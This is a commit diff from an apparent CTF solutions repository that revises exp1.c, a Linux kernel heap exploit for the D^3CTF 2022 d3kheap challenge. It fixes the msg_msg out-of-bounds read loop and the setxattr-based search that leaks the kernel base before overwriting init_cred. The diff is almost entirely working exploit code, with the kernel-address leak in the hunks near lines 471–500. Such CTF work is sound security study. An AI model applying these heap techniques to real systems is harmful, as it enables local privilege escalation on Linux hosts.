update

086efad6 · _sky123_ · eecfb92a · 086efad6 · 086efad6
隐藏空白更改
内联并排

Showing with 13 addition and 17 deletion

glibc_pwn/settings.zip glibc_pwn/settings.zip +0 -0

linux_kernel_pwn/D^3CTF2022_d3kheap/give_to_user/exp1.c linux_kernel_pwn/D^3CTF2022_d3kheap/give_to_user/exp1.c +13 -17

未找到文件。
--- a/glibc_pwn/settings.zip
+++ b/glibc_pwn/settings.zip
--- a/linux_kernel_pwn/D^3CTF2022_d3kheap/give_to_user/exp1.c
+++ b/linux_kernel_pwn/D^3CTF2022_d3kheap/give_to_user/exp1.c
@@ -8,7 +8,6 @@
 #include <fcntl.h>
 #include <string.h>
 #include <stdint.h>
-#include <sys/mman.h>
 #include <sys/ioctl.h>
 #include <sys/ipc.h>
 #include <sys/msg.h>
@@ -437,7 +436,7 @@ int main() {
    size_t msg_queue_addr = 0;
    size_t msg_msg_offset;
    int msg_queue_index = -1;
-    for (int i = sizeof(msgbuf.mtext); i < DATALEN_MSG; i += 8) {
+    for (int i = sizeof(msgbuf.mtext); i + HEAP_SIZE < DATALEN_MSG; i += HEAP_SIZE) {
        struct msg_msg *msg_msg = (struct msg_msg *) &oob_msgbuf.mtext[i];
        if (is_dir_mapping_addr((size_t) msg_msg->m_list.next)
            && msg_msg->m_list.next == msg_msg->m_list.prev
@@ -472,25 +471,12 @@ int main() {
    size_t msg_msg_addr = *(size_t *) &oob_msgbuf.mtext[DATALEN_MSG];
    printf("[+] msg_msg addr: %p\n", msg_msg_addr);

-    size_t cur_search_addr = msg_msg_addr - 8;
+    size_t cur_search_addr = msg_queue_addr - 8;
    while (kernel_offset == INVALID_KERNEL_OFFSET) {
-        printf("[*] current searching addr: %p\n", cur_search_addr);
-        build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_SEG, cur_search_addr, 0);
-        setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
-        if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
-            puts("[-] msgrcv failed.");
-            return -1;
-        }
-        printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
-        qword_dump("leak kernel addr form heap space", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
-        kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
-        if (kernel_offset != INVALID_KERNEL_OFFSET) {
-            break;
-        }
        size_t msg_offset = -1;
        for (int i = DATALEN_MSG + DATALEN_SEG - 8; i >= DATALEN_MSG; i -= 8) {
            if (!*(size_t *) &oob_msgbuf.mtext[i]) {
-                msg_offset = i - DATALEN_MSG;
+                msg_offset = i - DATALEN_MSG + 8;
                break;
            }
        }
@@ -499,6 +485,16 @@ int main() {
            exit(-1);
        }
        cur_search_addr += msg_offset;
+        printf("[*] current searching addr: %p\n", cur_search_addr);
+        build_msg(fake_msg, 0, 0, 0, DATALEN_MSG + DATALEN_SEG, cur_search_addr, 0);
+        setxattr("/flag", "sky123", fake_msg, HEAP_SIZE, 0);
+        if (peek_msg(msqid[0], &oob_msgbuf, DATALEN_MSG + DATALEN_SEG, 0) < 0) {
+            puts("[-] msgrcv failed.");
+            return -1;
+        }
+        printf("[*] msgbuf->mtype: %ld\n", oob_msgbuf.mtype);
+        qword_dump("leak kernel addr form heap space", &oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
+        kernel_offset = search_kernel_offset(&oob_msgbuf.mtext[DATALEN_MSG], DATALEN_SEG);
    }

    init_cred += kernel_offset;